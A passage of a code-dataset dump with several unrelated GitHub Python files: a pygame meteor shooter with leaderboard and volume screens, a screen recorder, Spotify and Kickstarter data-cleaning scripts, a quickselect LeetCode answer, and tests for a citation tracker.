else:\n menu_text = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(menu_text, [167, 515])\n\n screen.blit(ladders_text, (145, 0))\n\n screen.blit(cl_text, (36, 73))\n screen.blit(pl_text, (288, 73))\n screen.blit(daily_text, (42, 115))\n screen.blit(weekly_text, (177, 115))\n screen.blit(monthly_text, (330, 115))\n\n if 235 >= mouse[0] >= 10 and 108 >= mouse[1] >= 73 and click[0] == 1:\n select1 = True\n select2 = False\n elif 470 >= mouse[0] >= 245 and 108 >= mouse[1] >= 73 and click[0] == 1:\n select2 = True\n select1 = False\n\n if 156 >= mouse[0] >= 10 and 170 >= mouse[1] >= 120 and click[0] == 1:\n select3 = True\n select4 = False\n select5 = False\n elif 312 >= mouse[0] >= 166 and 170 >= mouse[1] >= 120 and click[0] == 1:\n select3 = False\n select4 = True\n select5 = False\n elif 468 >= mouse[0] >= 322 and 170 >= mouse[1] >= 120 and click[0] == 1:\n select3 = False\n select4 = False\n select5 = True\n\n if select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (8, 71, 230, 40), 3)\n elif select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (243, 71, 230, 40), 3)\n if select3 and select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (8, 118, 151, 55), 3)\n self_d_text = smalltext.render(str(self_md[0]), True, WHITE)\n top1_d_text = smalltext.render(str(top5_d[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_d[0][1]), True, WHITE)\n\n top2_d_text = smalltext.render(str(top5_d[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_d[1][1]), True, WHITE)\n\n top3_d_text = smalltext.render(str(top5_d[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_d[2][1]), True, WHITE)\n\n top4_d_text = smalltext.render(str(top5_d[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_d[3][1]), True, WHITE)\n\n top5_d_text = smalltext.render(str(top5_d[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_d[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_d_text, [50, 256])\n screen.blit(top2_d_text, [50, 311])\n screen.blit(top3_d_text, [50, 363])\n screen.blit(top4_d_text, [50, 419])\n screen.blit(top5_d_text, [50, 474])\n\n screen.blit(self_d_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select4 and select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (164, 118, 151, 55), 3)\n self_w_text = smalltext.render(str(self_mw[0]), True, WHITE)\n top1_w_text = smalltext.render(str(top5_w[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_w[0][1]), True, WHITE)\n\n top2_w_text = smalltext.render(str(top5_w[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_w[1][1]), True, WHITE)\n\n top3_w_text = smalltext.render(str(top5_w[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_w[2][1]), True, WHITE)\n\n top4_w_text = smalltext.render(str(top5_w[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_w[3][1]), True, WHITE)\n\n top5_w_text = smalltext.render(str(top5_w[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_w[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_w_text, [50, 256])\n screen.blit(top2_w_text, [50, 311])\n screen.blit(top3_w_text, [50, 363])\n screen.blit(top4_w_text, [50, 419])\n screen.blit(top5_w_text, [50, 474])\n\n screen.blit(self_w_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select5 and select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (320, 118, 151, 55), 3)\n self_m_text = smalltext.render(str(self_mm[0]), True, WHITE)\n top1_m_text = smalltext.render(str(top5_m[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_m[0][1]), True, WHITE)\n\n top2_m_text = smalltext.render(str(top5_m[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_m[1][1]), True, WHITE)\n\n top3_m_text = smalltext.render(str(top5_m[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_m[2][1]), True, WHITE)\n\n top4_m_text = smalltext.render(str(top5_m[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_m[3][1]), True, WHITE)\n\n top5_m_text = smalltext.render(str(top5_m[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_m[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_m_text, [50, 256])\n screen.blit(top2_m_text, [50, 311])\n screen.blit(top3_m_text, [50, 363])\n screen.blit(top4_m_text, [50, 419])\n screen.blit(top5_m_text, [50, 474])\n\n screen.blit(self_m_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n if select3 and select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (8, 118, 151, 55), 3)\n self_d_text = smalltext.render(str(self_pmd[0]), True, WHITE)\n top1_d_text = smalltext.render(str(top5_pd[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_pd[0][1]), True, WHITE)\n\n top2_d_text = smalltext.render(str(top5_pd[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_pd[1][1]), True, WHITE)\n\n top3_d_text = smalltext.render(str(top5_pd[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_pd[2][1]), True, WHITE)\n\n top4_d_text = smalltext.render(str(top5_pd[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_pd[3][1]), True, WHITE)\n\n top5_d_text = smalltext.render(str(top5_pd[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_pd[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_d_text, [50, 256])\n screen.blit(top2_d_text, [50, 311])\n screen.blit(top3_d_text, [50, 363])\n screen.blit(top4_d_text, [50, 419])\n screen.blit(top5_d_text, [50, 474])\n\n screen.blit(self_d_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select4 and select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (164, 118, 151, 55), 3)\n self_w_text = smalltext.render(str(self_pmw[0]), True, WHITE)\n top1_w_text = smalltext.render(str(top5_pw[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_pw[0][1]), True, WHITE)\n\n top2_w_text = smalltext.render(str(top5_pw[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_pw[1][1]), True, WHITE)\n\n top3_w_text = smalltext.render(str(top5_pw[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_pw[2][1]), True, WHITE)\n\n top4_w_text = smalltext.render(str(top5_pw[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_pw[3][1]), True, WHITE)\n\n top5_w_text = smalltext.render(str(top5_pw[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_pw[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_w_text, [50, 256])\n screen.blit(top2_w_text, [50, 311])\n screen.blit(top3_w_text, [50, 363])\n screen.blit(top4_w_text, [50, 419])\n screen.blit(top5_w_text, [50, 474])\n\n screen.blit(self_w_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select5 and select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (320, 118, 151, 55), 3)\n self_m_text = smalltext.render(str(self_pmm[0]), True, WHITE)\n top1_m_text = smalltext.render(str(top5_pm[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_pm[0][1]), True, WHITE)\n\n top2_m_text = smalltext.render(str(top5_pm[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_pm[1][1]), True, WHITE)\n\n top3_m_text = smalltext.render(str(top5_pm[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_pm[2][1]), True, WHITE)\n\n top4_m_text = smalltext.render(str(top5_pm[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_pm[3][1]), True, WHITE)\n\n top5_m_text = smalltext.render(str(top5_pm[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_pm[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_m_text, [50, 256])\n screen.blit(top2_m_text, [50, 311])\n screen.blit(top3_m_text, [50, 363])\n screen.blit(top4_m_text, [50, 419])\n screen.blit(top5_m_text, [50, 474])\n\n screen.blit(self_m_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 316 >= mouse[0] >= 167 and 572 >= mouse[1] >= 534:\n looking_stats = False\n menu()\n\n clock.tick(60)\n pygame.display.update()\n\n\ndef score(pts):\n pts_text = smalltext.render(\"Score: \" + str(pts), True, YELLOW)\n screen.blit(pts_text, [0, 0])\n\n\ndef settings():\n global gear\n global volume\n global target\n global paused\n gear = True\n while gear:\n screen.fill(GRAY)\n volume0_pos = 140\n volume100_pos = 340\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if paused is True and 285 >= mouse[0] >= 157 and 357 >= mouse[1] >= 317:\n back_text = mediumtext.render(\"BACK\", True, BLUE)\n screen.blit(back_text, [155, 300])\n elif paused is True:\n back_text = mediumtext.render(\"BACK\", True, LIGHT_BLUE)\n screen.blit(back_text, [155, 300])\n if 307 >= mouse[0] >= 157 and 457 >= mouse[1] >= 417 and not paused:\n About = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(About, [155, 400])\n elif not paused:\n About = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(About, [155, 400])\n\n sound_text = mediumtext.render(\"VOLUME\", True, LIGHT_BLUE)\n\n screen.blit(sound_text, [130, 25])\n\n pygame.draw.rect(screen, WHITE, ((140, 180), (200, 3)))\n\n if volume100_pos >= mouse[0] >= volume0_pos and 170 <= mouse[1] <= 190 and click[0] == 1:\n target = True\n elif click[0] == 0:\n target = False\n\n if target and volume100_pos >= mouse[0] >= volume0_pos:\n pygame.draw.circle(screen, WHITE, (mouse[0], 180), 10)\n volume = (mouse[0] - volume0_pos) // 2\n\n elif target and mouse[0] < volume0_pos:\n pygame.draw.circle(screen, WHITE, (volume0_pos, 180), 10)\n volume = 0\n elif target and mouse[0] > volume100_pos:\n pygame.draw.circle(screen, WHITE, (volume100_pos, 180), 10)\n volume = 100\n else:\n pygame.draw.circle(screen, WHITE, (volume * 2 + volume0_pos, 180), 10)\n\n if 100 > volume >= 10:\n volume_percentage = mediumtext.render(\" \" + str(volume) + \"%\", True, LIGHT_BLUE)\n\n elif volume < 10:\n volume_percentage = mediumtext.render(\" \" + str(volume) + \"%\", True, LIGHT_BLUE)\n\n elif volume == 100:\n volume_percentage = mediumtext.render(str(volume) + \"%\", True, LIGHT_BLUE)\n\n screen.blit(volume_percentage, [180, 85])\n\n crash_sound.set_volume(0.08 * (0.01 * volume))\n player_crashed.set_volume(0.3 * (0.01 * volume))\n laser_sound.set_volume(0.2 * (0.01 * volume))\n pygame.mixer.music.set_volume(0.2 * (0.01 * volume))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 335 >= mouse[0] >= 155 and 457 >= mouse[1] >= 417 and not paused:\n gear = False\n paused = False\n menu()\n if 285 >= mouse[0] >= 157 and 357 >= mouse[1] >= 317 and paused is True:\n gear = False\n pause()\n\n pygame.display.flip()\n pygame.display.update()\n clock.tick(60)\n\n\ndef player_statistics():\n stats = True\n stats_tuple = show_stats()\n max_points_text = smalltext.render('Maximum points:' + ' ' + str(stats_tuple[0]), True, WHITE)\n total_points_text = smalltext.render('Total points:' + ' ' + str(stats_tuple[1]), True, WHITE)\n games_played_text = smalltext.render('Games played:' + ' ' + str(stats_tuple[2]), True, WHITE)\n max_daily_points_text = smalltext.render('Maximum daily points:' + ' ' + str(stats_tuple[3]), True, WHITE)\n max_weekly_points_text = smalltext.render('Maximum weekly points:' + ' ' + str(stats_tuple[4]), True, WHITE)\n max_monthly_points_text = smalltext.render('Maximum monthly points:' + ' ' + str(stats_tuple[5]), True, WHITE)\n while stats:\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(mouse)\n screen.fill(GRAY)\n\n if 316 >= mouse[0] >= 167 and 457 >= mouse[1] >= 417:\n menu_text = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(menu_text, [167, 400])\n else:\n menu_text = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(menu_text, [167, 400])\n\n pygame.draw.rect(screen, WHITE, (63, 20, 360, 320), 3)\n\n screen.blit(max_points_text, [73, 25])\n screen.blit(total_points_text, [73, 75])\n screen.blit(games_played_text, [73, 125])\n screen.blit(max_daily_points_text, [73, 175])\n screen.blit(max_weekly_points_text, [73, 225])\n screen.blit(max_monthly_points_text, [73, 275])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 316 >= mouse[0] >= 167 and 457 >= mouse[1] >= 417:\n stats = False\n menu()\n\n pygame.display.update()\n clock.tick(60)\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n click = pygame.mouse.get_pressed()\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(player_img, (50, 35))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = 21\n # pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n # hitboxes CBEPXY\n self.rect.centerx = WIDTH // 2\n self.nickname = ''\n self.rect.bottom = HEIGHT - 10\n self.speedx = 0\n\n def update(self):\n self.speedx = 0\n keystate = pygame.key.get_pressed()\n if keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedx = -5\n if keystate[pygame.K_RIGHT] or keystate[pygame.K_d]:\n self.speedx = 5\n self.rect.x += self.speedx\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def shoot(self):\n bullet = Bullet(self.rect.centerx, self.rect.top)\n all_sprites.add(bullet)\n bullets.add(bullet)\n\n\nclass Mob(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image_orig = meteor_img\n self.image_orig.set_colorkey(BLACK)\n self.image = self.image_orig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * .85 / 2)\n # pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-100, -40)\n self.speedy = random.randrange(sx, sy + 7)\n self.speedx = random.randrange(sx - 6, sy + 2)\n self.rot = 0\n self.rot_speed = random.randrange(-8, 8)\n self.last_update = pygame.time.get_ticks()\n\n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > 50:\n self.last_update = now\n self.rot = (self.rot + self.rot_speed) % 360\n new_image = pygame.transform.rotate(self.image_orig, self.rot)\n old_center = self.rect.center\n self.image = new_image\n self.rect = self.image.get_rect()\n self.rect.center = old_center\n\n def update(self):\n self.rotate()\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > HEIGHT + 10 or self.rect.left < -25 or self.rect.right > WIDTH + 20:\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-100, -40)\n self.speedy = random.randrange(sx, sy + 7)\n\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosion_anim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 40\n\n def update(self):\n explosions.add(self)\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(explosion_anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosion_anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = bullet_img\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedy = -10\n\n def update(self):\n self.rect.y += self.speedy\n # kill if it moves out from screen\n if self.rect.bottom < 0:\n self.kill()\n\n\nfor i in range(9):\n filename = \"regularExplosion0{}.png\".format(i)\n img = pygame.image.load(filename).convert()\n img.set_colorkey(BLACK)\n img_lg = pygame.transform.scale(img, (75, 75))\n explosion_anim[\"lg\"].append(img_lg)\n img_sm = pygame.transform.scale(img, (32, 32))\n explosion_anim[\"sm\"].append(img_sm)\n\n# \nall_sprites = pygame.sprite.Group()\nmobs = pygame.sprite.Group()\nplayer = Player()\nall_sprites.add(player)\nbullets = pygame.sprite.Group()\nexplosions = pygame.sprite.Group()\n\n\n# \n\n\ndef spawn():\n for i in range(meteors):\n m = Mob()\n all_sprites.add(m)\n mobs.add(m)\n\n\nspawn()\nauthorization_window()\n# menu()\n\nwhile running:\n # keep loop running at the right speed\n clock.tick(FPS)\n # Process input (events)\n for event in pygame.event.get():\n click = pygame.mouse.get_pressed()\n # check for game over\n if event.type == pygame.QUIT:\n running = False\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if click[0] == 1:\n player.shoot()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and len(bullets) < shootlimit: # shooting here\n player.shoot()\n pygame.mixer.Sound.play(laser_sound)\n\n if event.key == pygame.K_ESCAPE:\n pause()\n\n if 100 > pts >= 50:\n shootlimit = 8\n if sy + sx == 2:\n sy += 2\n if 150 > pts >= 100:\n shootlimit = 7\n if sy + sx == 4:\n sy += 2\n if 200 > pts >= 150:\n shootlimit = 6\n if sy + sx == 6:\n sy += 1\n if 250 > pts >= 200:\n shootlimit = 5\n if sy + sx == 7:\n sy += 1\n if 300 > pts >= 250:\n shootlimit = 4\n if sy + sx == 9:\n sy += 1\n if pts >= 300:\n shootlimit = 3\n if sy + sx == 11:\n sy += 2\n # Update\n pygame.display.update()\n all_sprites.update()\n # check to see if a bullet hit a mob\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n\n for hit in hits:\n m = Mob()\n all_sprites.add(m)\n mobs.add(m)\n pygame.mixer.Sound.play(crash_sound)\n pts += 1\n expl = Explosion(hit.rect.center, \"lg\")\n all_sprites.add(expl)\n # check to see if a mob hit the player\n hits = pygame.sprite.spritecollide(player, mobs, False, pygame.sprite.collide_circle)\n if hits:\n update_stats(pts)\n pygame.mixer.Sound.play(player_crashed)\n running = False\n time.sleep(1)\n died()\n\n # Draw and render\n screen.blit(background, background_rect)\n all_sprites.draw(screen)\n score(pts)\n # helpful thing\n pygame.display.flip()\n\n","repo_name":"dshumilin03/apocalypse_game","sub_path":"proekt.py","file_name":"proekt.py","file_ext":"py","file_size_in_byte":60129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"388407092","text":"# importing the required packages \r\nimport pyautogui \r\nfrom PIL import ImageGrab\r\nimport cv2 \r\nimport numpy as np \r\nimport keyboard\r\n\r\n# Specify resolution \r\nresolution = pyautogui.size()\r\n\r\n# Specify video codec \r\ncodec = cv2.VideoWriter_fourcc(*'mp4v')\r\n\r\n\r\n# Specify name of Output file \r\nfilename = \"Recording.mp4\"\r\n\r\n# Specify frames rate. We can choose any \r\n# value and experiment with it \r\nfps = 30.0\r\n\r\n\r\n# Creating a VideoWriter object \r\nout = cv2.VideoWriter(filename, codec, fps, resolution) \r\n\r\n# check if a esc is pressed\r\nprint(keyboard.is_pressed('esc'))\r\nwhile keyboard.is_pressed('esc')!=True: \r\n\t# Take screenshot using PyAutoGUI \r\n\timg = ImageGrab.grab(bbox=None)\r\n\r\n\t# Convert the screenshot to a numpy array \r\n\tframe = np.array(img) \r\n\r\n\t# Convert it from BGR(Blue, Green, Red) to \r\n\t# RGB(Red, Green, Blue) \r\n\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n\tcurrentMouseX, currentMouseY = pyautogui.position() \r\n\tframe = cv2.circle(frame, (currentMouseX, currentMouseY), 15, (0,255,0), -1)\r\n\t# Write it to the output file \r\n\tout.write(frame) \r\n\t\r\n\t# Optional: Display the recording screen \r\n\t# cv2.imshow('Live', frame) \r\n\t\r\n\t# Stop recording when we press 'q' \r\n\t# if cv2.waitKey(1) == ord('q'): \r\n\t# \tbreak\r\n\r\n# Release the Video writer \r\nout.release() \r\n\r\n# Destroy all windows \r\n# cv2.destroyAllWindows()\r\n\r\n\r\n\r\n","repo_name":"chanshu19/screen-recorder","sub_path":"Screen_Recorder.py","file_name":"Screen_Recorder.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19397001569","text":"\"\"\"Prepare features for Spotify genre critique analog\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport string\nimport matplotlib.pyplot as plt\nimport ast\n\n# Stich records together\nframe=[]\nfile_list=['number']+list(string.ascii_uppercase)\n\nfor fname in file_list:\n\tfpath='data/typ_paper_1b/'+fname+'.tsv'\n\tdf=pd.read_csv(fpath,sep='\\t',encoding='utf8')\n\tframe.append(df)\n\ndf=pd.concat(frame,ignore_index=True)\ndf=df.dropna()\n\nchart_path = 'data/chart_record.tsv'\nchart=pd.read_csv(chart_path,sep='\\t',index_col=0,encoding='utf8')\ndf_c=df.merge(chart)\n\ndf['peak']=0\ndf['week']=0\ndf['long']=False\ndf['decade']=0\ndf.release=pd.to_datetime(df.release)\n\n# Expand genre \ngenres=['hip','rap','rock','metal','folk','country','blues','r&b','soul','disco','funk','pop','none']\nfor g in genres:\n\tdf[g]=0\nfor x in df.iterrows():\n\tgv=[1 if x[1].genre==g else 0 for g in range(len(genres))]\n\tdf.loc[x[0],genres]=gv\n\n# Find peak position and weeks on chart for each song along with control for long songs and time block\nfor x in df.iterrows():\n\tprint(x[0])\n\tartist=x[1].artist\n\ttitle=x[1].title\n\trelease=x[1].release\n\tduration_ms=x[1].duration_ms\n\tlabels=x[1].label\n\tlabels=ast.literal_eval(labels)\n\n\tdecade=np.floor((release-np.datetime64('1957','Y'))/np.timedelta64(52,'W')/5)\n\tchart_weeks=max(df_c.loc[(df_c.artist==artist) & (df_c.title==title),'week'])\n\tpeak=min(df_c.loc[(df_c.artist==artist) & (df_c.title==title),'peak'])\n\tlen_record=df.loc[(df.release<=release) & (df.release>=release-np.timedelta64(52,'W')),'duration_ms'].tolist()\n\tlong_threshold=np.mean(len_record)+np.std(len_record)*2\n\n\tdf.loc[(df.artist==artist) & (df.title==title),['week','long','peak','decade']]=[chart_weeks,\n\t\tlong_threshold int:\n k = len(nums) - k #index we are looking for after sorted\n \n def quickSelect(l, r):\n # partition\n p, pivot = l, nums[r]\n for i in range(l, r):\n if nums[i] <= pivot:\n nums[p], nums[i] = nums[i], nums[p]\n p += 1\n \n nums[p], nums[r] = nums[r], nums[p]\n \n if p > k: # meaning k is in left side\n return quickSelect(l, p - 1)\n if p < k: # meaning k is in the right side\n return quickSelect(p + 1, r)\n else:\n return nums[p]\n \n \n return quickSelect(0, len(nums) - 1)","repo_name":"chrispangg/LeetCodeAnswers","sub_path":"0215-kth-largest-element-in-an-array/0215-kth-largest-element-in-an-array.py","file_name":"0215-kth-largest-element-in-an-array.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10584854870","text":"from pathlib import Path\n\nfrom r2t2.static_parser import locate_references\n\n\nHERE = Path(__file__).parent\nFIXTURES = HERE / \"fixtures\"\nSAMPLE_PATH = FIXTURES / \"sample_code.py\"\n\n\nclass TestLocateReferences:\n def test_accepts_str(self, bib_with_tracking):\n locate_references(str(SAMPLE_PATH))\n assert \"Great British Roasts, 2019\" in bib_with_tracking.references\n\n def test_accepts_path(self, bib_with_tracking):\n locate_references(SAMPLE_PATH)\n assert \"Great British Roasts, 2019\" in bib_with_tracking.references\n\n def test_globs_for_folder(self, bib_with_tracking):\n locate_references(FIXTURES)\n assert \"Great British Roasts, 2019\" in bib_with_tracking.references\n","repo_name":"ImperialCollegeLondon/R2T2","sub_path":"tests/test_static_parser.py","file_name":"test_static_parser.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"35"} +{"seq_id":"38183149273","text":"from datetime import date\nfrom numpy import datetime64\nimport pandas as pd\nimport json\nimport os\nfrom pathlib import Path\n\nkeys_to_keep = [\"name\", \"goal\", \"pledged\", \"state\", \"slug\",\n \"country\", \"currency\", 'state_changed_at',\n \"deadline\", \"created_at\", \"launched_at\",\n \"backers_count\", \"usd_pledged\",\n 'usd_pledged',\n \"creator\"]\n\nall_keys = ['id', 'photo', 'name', 'blurb', 'goal', 'pledged',\n 'state', 'slug', 'disable_communication', 'country',\n 'country_displayable_name', 'currency', 'currency_symbol',\n 'currency_trailing_code', 'deadline', 'state_changed_at',\n 'created_at', 'launched_at', 'staff_pick', 'is_starrable',\n 'backers_count', 'static_usd_rate', 'usd_pledged',\n 'converted_pledged_amount', 'fx_rate', 'usd_exchange_rate',\n 'current_currency', 'usd_type', 'creator', 'location',\n 'category', 'profile', 'spotlight', 'urls', 'source_url']\n\nkeys_to_dump = [x for x in all_keys if x not in keys_to_keep]\n\ncolumns_to_keep = ['name', 'goal', 'pledged', 'state', 'slug', 'country',\n 'currency', 'deadline', 'created_at',\n 'launched_at', 'backers_count', 'usd_pledged',\n 'converted_pledged_amount', 'fx_rate',\n 'usd_exchange_rate', 'current_currency', 'usd_type', \n 'creator_name', 'state_changed_at']\n\nto_datetime_columns = ['created_at',\"launched_at\",'deadline','state_changed_at']\n\ndef unix_to_datetime(df,columns_to_change=to_datetime_columns):\n for col in columns_to_change:\n df[col] = pd.to_datetime(df[col],unit='s')\n return df\n\ndef datetime_to_unix(df):\n for col in df.columns:\n try:\n if type(df[col][0]) == pd.Timestamp:\n df[col] = df[col].astype(int) / 10**9\n except:\n print(\"Something went wrong!\")\n return df\n\ndef list_of_lines(filepath):\n with open(filepath) as fp:\n lines = fp.readlines()\n return lines\n\n\ndef build_df_from_lines_list(line_list, category=34):\n df = pd.DataFrame()\n for line in line_list:\n try:\n line_dict = json.loads(line[line.index('{\"id\":'):-2])\n if line_dict[\"category\"][\"id\"] == category:\n for key in keys_to_dump:\n try:\n line_dict.pop(key)\n except:\n continue\n df_temp = pd.json_normalize(line_dict, sep='_')\n df = pd.concat([df, df_temp])\n except:\n continue\n return df\n\ndef build_df_from_all_files_in_dir(directory = \"data/kickstarter_json/\"):\n pathlist = Path(directory).glob('**/*.json')\n df_all = pd.DataFrame()\n counter = 0\n for path in pathlist:\n file_path = str(path)\n print(file_path)\n lines = list_of_lines(file_path)\n df_temp = build_df_from_lines_list(lines)\n df_all = pd.concat([df_all, df_temp])\n counter += 1\n print(f\"{counter} files have been dataframed\")\n return df_all\n\n\ndef clean_df(df,cols_to_keep=columns_to_keep):\n df = df[columns_to_keep]\n df = unix_to_datetime(df)\n try:\n df.rename({\"name\":\"game_name\"},axis=1,inplace=True)\n except:\n print(\"ERROR: Could not find columns name 'name'\")\n try:\n df = df.astype({'usd_pledged': f\"{'float64'}\"}).round(2)\n except:\n print(\"ERROR: Could not round or find column name 'usd_pledged'\")\n df['game_name'] = df['game_name'].str.findall(r'\\w|\\s').str.join('').str.replace(r\"\\s+\",\"_\").str.lower()\n return df\n\n\ndef list_of_categories(filepath, dumpfile=False):\n # read file\n with open(filepath) as fp:\n lines = fp.readlines()\n # build dict with all the category ids and \"slug\" names\n category_dict = dict()\n for line in lines:\n line_dict = json.loads(line[line.index('{\"id\":'):-2])\n category_dict[line_dict[\"category\"][\"id\"]\n ] = line_dict[\"category\"][\"slug\"]\n # build list from dict and sort it\n list_of_categories = []\n for key, value in category_dict.items():\n list_of_categories.append([key, value])\n list_of_categories.sort()\n # dump result into file\n if dumpfile:\n with open(\"kickstarter_categories.txt\", \"w\") as fp:\n for item in list_of_categories:\n fp.writelines(f\"id: {item[0]} ---> {item[1]}\\n\")\n return list_of_categories\n\n\ndef rename_kickstarter_files(directory):\n for filename in os.listdir(directory):\n # Construct old file name\n source = f\"{directory}{filename}\"\n # Adding the count to the new file name and extension\n if 